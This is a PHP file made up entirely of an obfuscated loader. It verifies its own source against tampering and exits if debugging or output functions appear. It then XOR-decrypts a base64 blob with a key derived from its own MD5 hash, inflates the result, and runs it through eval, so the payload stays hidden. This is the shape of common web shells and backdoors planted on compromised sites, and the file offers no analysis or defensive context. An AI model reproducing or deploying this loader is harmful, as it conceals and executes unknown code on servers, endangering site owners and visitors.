<?php
$sqynwsvxpypo="df454d947daef26ce20fa37020cb8f84";
$nvibgqih="530405500d550a020e5500555651025357050604580a55540756025409555904";
$wclbtygsaxil="ovJ8b/oRI7OWEyN5i+od6fTTHqPRaWc1/Co7TMp1KmqN8F+7+cGNAQayjHcGL6b9wY533zs9DnW9OtnXrZGWHQ6Q4TnhhShziJZ7UlCMj3QcsTWuNZCnZ+Y4QHxPRKnp9HuD92aK3fKKUOjWqYiu9eTxUlvLstnqLSOREbOXCfMoKo1yFVOruCeia6LH36IlUJ7pVspwcaPExN1fTTI=";
$wnnzmsmdh=file_get_contents(__FILE__);
$utpotej=str_replace($wclbtygsaxil,"",$wnnzmsmdh);
if(strpos($utpotej,"ec"."ho")!==false||strpos($utpotej,"pr"."int")!==false||strpos($utpotej,"var_"."dump")!==false||strpos($utpotej,"file_put_"."contents")!==false||strpos($utpotej,"fw"."rite")!==false){die();}
$jzmexokzzmls=str_replace(array($sqynwsvxpypo,$nvibgqih),array("SP_e1c79cba","KP_ed878283"),$wnnzmsmdh);
$urbwqqkewin=md5($jzmexokzzmls);
$kimrtt=hex2bin($nvibgqih);
$pnmsvgma="";
$kyffaagdu=strlen($urbwqqkewin);
for($ygoglby=0;$ygoglby<$kyffaagdu;$ygoglby++){
    $pnmsvgma.=chr(ord($kimrtt[$ygoglby])^ord($urbwqqkewin[$ygoglby]));
}
$jtqurhf=base64_decode($wclbtygsaxil);
$ikvsgvsw=strlen($jtqurhf);
$elhcorqaydbp="";
$fizqknau=strlen($pnmsvgma);
for($ygoglby=0;$ygoglby<$ikvsgvsw;$ygoglby++){
    $elhcorqaydbp.=$jtqurhf[$ygoglby]^$pnmsvgma[$ygoglby%$fizqknau];
}
$anpunpdbnsfy="gz"."in"."fl"."ate";
eval($anpunpdbnsfy($elhcorqaydbp));
